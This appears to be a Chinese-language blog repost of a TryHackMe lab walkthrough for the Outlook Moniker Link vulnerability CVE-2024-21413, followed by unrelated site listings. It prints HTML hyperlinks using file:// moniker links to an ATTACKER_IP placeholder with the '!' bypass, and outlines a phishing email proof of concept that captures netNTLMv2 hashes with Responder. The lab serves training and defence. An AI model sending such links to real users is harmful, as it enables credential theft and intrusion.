news 2026/4/18 11:04:36

深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

Tryhackme — Moniker Link (CVE-2024–21413)

任务 1 — 简介
2024年2月13日,微软公布了一个Microsoft Outlook远程代码执行(RCE)及凭证泄露漏洞,分配的CVE编号为CVE-2024–21413(Moniker Link)。Check Point Research的Haifei Li被确认发现了此漏洞。

该漏洞在处理一种称为“Moniker Link”的特殊超链接时,绕过了Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦受害者点击该超链接,就会导致Outlook将用户的NTLM凭证发送给攻击者。

回答以下问题:
该CVE被分配的“严重性”等级是什么?
= 严重

任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用file://类型的Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件(<a href="file://ATTACKER_IP/test">Click me</a>)。此过程使用SMB协议,该协议会使用本地凭证进行身份验证。然而,Outlook的“受保护的视图”功能会捕获并阻止此尝试。

<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>

此处的漏洞在于,修改我们的超链接,在Moniker Link中包含!特殊字符和一些文本,从而绕过Outlook的“受保护的视图”。例如:
<a href="file://ATTACKER_IP/test!exploit">Click me</a>.

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。请注意,远程设备上并不需要实际存在该共享,因为无论如何都会尝试进行身份验证,从而导致受害者的Windows netNTLMv2哈希值被发送给攻击者。

远程代码执行是可能的,因为Moniker Link在Windows上使用了组件对象模型。不过,对此进行解释目前超出了本房间的范围,因为尚未有公开发布的通过此特定CVE实现RCE的概念验证。

回答以下问题:
我们在超链接中使用哪种Moniker Link类型?
= file://
用于绕过Outlook“受保护的视图”的特殊字符是什么?
= !

任务 3 — 利用
数据: https://tryhackme.com/room/monikerlink

概念验证:

  • 需要攻击者和受害者的电子邮件。通常,你需要使用自己的SMTP服务器(本房间已为你提供)。
  • 需要密码进行身份验证。在本房间中,attacker@monikerlink.thm的密码是attacker
  • 包含电子邮件内容 (html_content),其中包含我们作为HTML超链接的Moniker Link。
  • 然后,填写电子邮件中的“主题”、“发件人”和“收件人”字段。
  • 最后,将电子邮件发送到邮件服务器。

我们在AttackBox上用来捕获用户哈希的应用程序名称是什么?
= responder
点击电子邮件中的超链接后捕获的哈希类型是什么?
= netNTLMv2

其他任务涉及新的Outlook更新,如果不看答案,你可能无法完成房间,因此答案已在任务本身中给出。

这是我的学习总结,希望对你有帮助,别忘了关注。FINISHED
CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 11:07:19

写作小白救星!千笔,本科生论文写作神器

你是否正在为论文写作而焦虑&#xff1f;选题无从下手、文献资料繁杂、框架逻辑混乱、查重率居高不下……这些难题是否让你夜不能寐&#xff1f;作为本科生&#xff0c;面对学术写作的重重挑战&#xff0c;很多人都感到力不从心。但别再独自挣扎&#xff0c;现在有了更聪明的选…

作者头像 李华
网站建设 2026/4/18 8:47:16

如何将联系人从 iPhone 转移到Android

从 iPhone 换到Android手机了吗&#xff1f;首先&#xff0c;你需要将 iPhone 上的数据&#xff08;例如备忘录、联系人、信息等&#xff09;传输到Android手机。然而&#xff0c;由于两台设备运行不同的操作系统&#xff0c;在两台设备之间传输数据可能需要花费大量的时间和精…

作者头像 李华
网站建设 2026/4/18 8:54:42

期现对冲交易系统合同状态监控功能解析

合同状态监控是期现业务管理的基础能力。实时掌握合同执行状态&#xff0c;能够及时发现异常&#xff0c;保障交收进度&#xff0c;降低业务风险。本文将详细介绍期现对冲交易系统中合同状态监控的设计思路与实现方法。 一、合同状态监控的业务价值 合同状态监控&#xff08;…

作者头像 李华
网站建设 2026/4/18 11:00:51

基于单片机的倒车防撞系统设计

基于单片机的倒车防撞系统设计 第一章 系统整体设计 基于单片机的倒车防撞系统以“低成本、高灵敏、易安装、多维度预警”为核心设计原则&#xff0c;面向家用轿车、小型货车等车型&#xff0c;解决传统倒车雷达仅提示距离、无主动预警防护的痛点。系统采用“距离检测-数据运算…

作者头像 李华
网站建设 2026/4/18 8:50:17

AI/AGI时代数据为王:隐私和伦理是指路明灯还是前行中的桎梏

Ai时代数据为王Q1&#xff1a;这是一个数据为王的时代&#xff1a;各类生成式大模型看似都还在“数据外围”&#xff08;非不能&#xff0c;只是利益阻隔&#xff09;&#xff0c;“最后一公里”都指向或停滞于真实数据&#xff0c;也就是说如果真想解决很真实的实际问题&#…

作者头像 李华
网站建设 2026/4/18 11:05:50

Python中的`set`与`frozenset`:可变与不可变集合的终极指南

Python中的set与frozenset&#xff1a;可变与不可变集合的终极指南一、为什么你需要了解集合&#xff1f;二、核心概念解析1. set&#xff08;可变集合&#xff09;2. frozenset&#xff08;不可变集合&#xff09;三、底层原理揭秘哈希表实现内存占用对比四、实战场景对比场景…

作者头像 李华